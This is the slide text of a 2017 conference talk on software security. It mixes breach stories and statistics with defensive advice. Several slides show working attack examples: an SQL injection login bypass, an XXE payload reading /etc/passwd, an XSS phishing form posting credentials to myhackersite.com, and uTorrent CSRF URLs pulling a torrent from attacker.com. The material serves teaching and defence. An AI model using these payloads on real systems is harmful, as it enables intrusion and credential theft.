If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)
11. 2011 Sony PlayStation Network Outage
•23 days outage of all Sony PS3 and PSP consoles
•77 000 000 user accounts exposed
• Over 12 000 credit card numbers stolen
• Outage costs were officially $171 000 000
12.
13. Some Facts and Numbers
97% of scanned Java apps in 2015 that had code quality errors
95% of the mobile apps were vulnerable
90% of web apps have security vulnerabilities
87% of PHP application with vulnerable security functions
43% of developers who released apps with known
vulnerabilities
39% increase of vulnerabilities in the last 5 years
10% of the applications still have hard-coded passwords
Sources: Vulnerability Review 2016-2017, Flexera Software; HPE Cyber Risk Report 2016; 2015 Trustwave Global Security Report; World Quality Report 2015-2016,
Capgemini; The Impact of Security on Development, Prevoty
15. The most important vulnerabilities
combined into 5 titles:
1. Insecure Interface
2. Insufficient Authentication
3. Security Misconfiguration
4. Lack of Transport Encryption
5. Privacy Concerns
17. THIS TALK SHOWS SOME TECHNIQUES FOR DEVELOPING BETTER
SOFTWARE SECURITY AND HACKER DEFENSE ATTITUDE.
YOU MAY USE THESE TECHNIQUES ON COMPUTERS, WEBSITES, SYSTEMS
AND SOFTWARE THAT YOU OWN.
PERFORMING HACK ATTEMPTS WITHOUT PERMISSION ON COMPUTERS
THAT YOU DO NOT OWN IS ILLEGAL.
18. SQL Injection explained in 3 steps:
String sqlQuery = "SELECT * FROM user WHERE name =
'" + username +"' AND pass='" + password + "'“
SELECT * FROM user WHERE name =
'Peter' AND pass='' OR '1'='1'
2. Setting username to Peter & password to ' OR '1'= '1 produces:
1. Imagine the following piece of code:
3. '1'='1' is always true, so Peter is logged in without password.
24. It can be even in
Problem:
• Checked MIME type only
• Fixed 8+ times until fully resolved
(05/2016)
• Vulnerabilities up to now: 403!!!
(11/2017)
• https://imagetragick.com/
25. Popular vulnerability in 2017:
XML External Entity (XXE) Processing
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd"
>]><foo>&xxe;</foo>
1. Application parses XML documents.
2. The XML processor is configured to validate and
process/resolve the document type declaration (DTD):
26. 2. Cross Site Scripting (XSS) explained
<script>alert('XSS')</script>
Put the following code in search field,
editbox or another text component:
27.
28.
29. Funny image or banner ad?
<img
src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefau
lt.jpg" width="80%">
30.
31. Entire login form that tricks the user?
This video is Hilarious..... worth every
second'<br><br>To see the search results, please
login with the form below before proceeding:<form
action="http://myhackersite.com/destination.php"><t
able><tr><td>Login:</td><td><input type=text
length=20
name=login></td></tr><tr><td>Password:</td><td><inp
ut type=text length=20
name=password></td></tr></table><input type=submit
value=LOGIN></form><br/><br/><br/><br/><br/><br/>
32.
33. The link to distribute is a little bit long…
http://testasp.vulnweb.com/Search.asp?tfSearch=This%20video%20is%20Hil
arious.....%20worth%20every%20second%27%3Cbr%3E%3Cbr%3ETo%20see
%20the%20search%20results%2C%20please%20login%20with%20the%20for
m%20below%20before%20proceeding%3A%3Cform%20action%3D%22http
%3A%2F%2Fmyhackersite.com%2Fdestination.asp%22%3E%3Ctable%3E%3C
tr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dte
xt%20length%3D20%20name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C
tr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%
3Dtext%20length%3D20%20name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ft
r%3E%3C%2Ftable%3E%3Cinput%20type%3Dsubmit%20value%3DLOGIN%3
E%3C%2Fform%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3
E%3Cbr%2F%3E%3Cbr%2F%3E
34. But that is what
URL shortening services are for…
Here is your phishing URL:
http://bit.ly/25zaEyy
36. 3. Cross-Site Request Forgery (CSRF)
causes a user's web browser to perform an unwanted action on a
trusted site for which the user is currently authenticated.
37. 3 Easy Steps for
uTorrent CSRF Exploit (2008)
1. Turn on “Move completed downloads” option:
http://localhost:14774/gui/?action=setsetting&s=d
ir_completed_download_flag&v=
38. 2. Change the path a completed downloads to
Windows startup folder:
http://localhost:14774/gui/?action=setsetting&s=d
ir_completed_download&v=C:Documents%20and
%20SettingsAll%20UsersStart%20MenuProgram
sStartup
3 Easy Steps for
uTorrent CSRF Exploit (2008)
39. 3 Easy Steps for uTorrent CSRF Exploit (2008)
3. Provide link to torrent containing .bat file and
malware software to the end user:
http://localhost:14774/gui/?action=add-
url&s=http://www.attacker.com/file.torrent
41. The Action Part (XSS&CSRF)
X-Frame-Options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
Regenerate cookies after login.
Check the IP address (or even contain it
in cookies)
42. 1. Trust no user input. Never. Ever!
2. Sanitize input and process only
100% trustworthy data.
3. Use parameterized queries and
stored procedures.
4. Test! There are many scanners
for SQLi, XSS, CSRF, etc.
The Action Part (Summary)
43. Penetration Testing Tools
OWASP ZAP (Zed Attack Proxy)
Nikto
Nmap
Acunetix
Bishop Vulnerability Scanner (Chrome Plugin)
Firebug (Firefox plugin)
HP Scrawlr & HP Webinspect
Havij Pro
Sqlmap
50. • 9.8% have the passwords password, 123456 or 12345678;
• 14% have a password from the top 10 passwords
• 40% have a password from the top 100 passwords
• 79% have a password from the top 500 passwords
• 91% have a password from the top 1 000 passwords
• 98.8% have a password from the top 10 000 passwords
51. 1. Limit login attempts.
2. Add password length and
character requirements.
The Action Part
52. … and the “big difference”:
The 3 most popular passwords
now hold “only” 1,2% of all passwords:
•Password1
•Hello123
•Welcome1
Source: TrustWave
53. 1. Limit login attempts.
2. Add password length and
character requirements.
3. Password encryption
The Action Part
55. Still Bad Option: Shift ASCII Code or Similar*
<server>
<id>my.server</id>
<username>admin</username>
<password>Zhofrph4</password>
</server>
* There was a hot dispute in developer’s forum whether shift
by 5 or shift by 12 is better
65. LinkedIn got hacked (2012)
•164 million accounts stolen
•Account info sold now on black market
•Check haveibeenpwned.com for your account
•There are concerns even for the current fixes
69. Use two or three factor
authentication
(at least for important stuff)
The Real Action Part
70.
71. Distributed Denial of Service (DDoS)
• TV Show (10000s people
visit your site)
• Early days: ICQ
• Nowadays: Malware
Victim
Daemon
Daemon
Daemon
Daemon
Daemon
Master
Real Attacker
73. Worse than DDoS: Ransomware
•Biggest problem of
2016 and 2017
•Usually encrypts the
files so they become
unusable
•Wants money to be
paid (usually in
untrackable BTC)
74. 1. Invest in hardware
2. Backup and Recovery Plans
The Action Part
75.
76. 1. Invest in hardware
2. Backup and Recovery Plans
3. Prevent flooding
The Action Part
77. Access Control
Removing any site from Google using URL
manipulation?
•Exploit in Google Webmaster Tools
•Fixed within 7 hours
https://www.google.com/webmasters/tools/removals-
request?hl=en&siteUrl=http:// {YOUR_URL} /&urlt=
{URL_TO_BLOCK}
77 Source: http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html
78. 1. Invest in hardware
2. Backup and Recovery Plans
3. Prevent flooding
4. Use Access Control Lists
5. Secure configuration, Logging
and Monitoring
The Action Part
79. Google is not Google?
(2012, Brazil)
•Biggest ISP in Brazil
•Firmware vulnerability
•4.5 million routers
•Malicious DNS servers
•Fake Google.com,
Facebook.com,
Yahoo.com and others
install malware
83. 0
100
200
300
400
500
600
700
2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015
Known vulnerabilities per year
by OS in the last 10 years
Windows
MacOS
Ubuntu (incl. kernel)
Debian (incl. kernel)
84.
85. 6. Minimum open ports and
running services
7. Frequent update of firmware and
software
8. Secure updates – use checksums
to avoid downloading fake update
The Action Part
90. 6. Minimum open ports and
running services, use firewall
7. Frequent update of firmware and
software
8. Secure updates – use checksums
to avoid downloading fake update
9. Improve physical security
The Action Part
94. Non-Encrypted POST query:
POST /path/script.cgi HTTP/1.0 From:
game@*site*.com User-Agent: HTTPTool/1.0 Content-
Type: application/x-www-form-urlencoded Content-
Length: 33 name=Peter&surname=Sabev&score=10
POST /path/script.cgi HTTP/1.0 From:
game@*site*.com User-Agent: HTTPTool/1.0 Content-
Type: application/x-www-form-urlencoded Content-
Length: 36 name=Peter&surname=Sabev&score=32767
My “next game” was with the following POST query:
When I finished the game, the following HTTP POST query was sent:
98. Jeep Cherokee remotely controlled
•Uconnect radio breach
•Anyone can control your car
•Just need to know car’s IP
address
•Chrysler recalls 1 400 000
vehicles
99. Plane hacked mid-air (05’2015)
•Just using laptop and LAN
cable
•Entertainment System
connected to the Cabin
Control System
•Default credentials
•Caused plane to climb in
simulated flight
101. Use recommended,
accepted and up to date
implementation and follow
the best encryption and
authentication practices.
The Action Part
102. Compare left and right…
Facebook.com
Google.com
Yahoo.com
Booking.com
Facebook.com
Google.com
Yahoo.com
Booking.com
103. The letters in red are Cyrillic (IDN attack)
Facebook.com
Google.com
Yahoo.com
Booking.com
Facebook.com
Google.com
Yahoo.com
Booking.com
104. Obtain EV certificate & use 2FA
Issue was resolved for browsers
in April 2017, still a problem for
emails and links in social
networks.
The Action Part
105.
106. London HIV Clinic
•Sent emails with addresses
using “To:” instead of “Bcc:”
• 730 of the 781 patients
contained people's full
names
•Fined £180,000
113. The Ashley Madison Data Breach
•9.7 GB user data stolen
•Search engine “Is he cheating on you?”
•32 000 000 user accounts compromised
•Punishment in Saudi Arabia is death
(about 1200 Saudi Arabian accounts leaked)
•2 people committed suicide
•$567 000 000 lawsuit
114. 1. Collect minimum personal information
(fight Marketing if needed)
2. Ensure all collected personal data is properly
protected+encrypted (when stored and in transit)
3. Ensure only authorized individuals have access to
personal information (incl. internally)
4. Be extra careful with logs, error messages, testing
with real data, using it with 3rd parties, etc.
The Action Part
115. Will my company be hacked?
Yes, eventually!
“It happened before, it will happen
again… It is just a question of when.”
-- Armageddon Movie
116. Create Responsible Disclosure Policy
“Please email security@mycompany.com to report any
security vulnerabilities”
Organize bug bounty!
See hackerone.com and bugcrowd.com
Choose white hats!
120. Links
www.owasp.org
Free Open Source Security Community
www.sans.org
SANS Institute, Certifications
https://cve.mitre.org/
Common Vulnerabilities and Exposures (CVE)
https://www.wired.com/category/security/
News and Updates
121. To avoid comedy and drama…
The Action Part: Summary
1. Don’t trust user input and always sanitize it
2. Careful with passwords, use 2FA
3. Keep your software updated and secure
4. Encrypt and store securely.
5. Be careful with sensitive data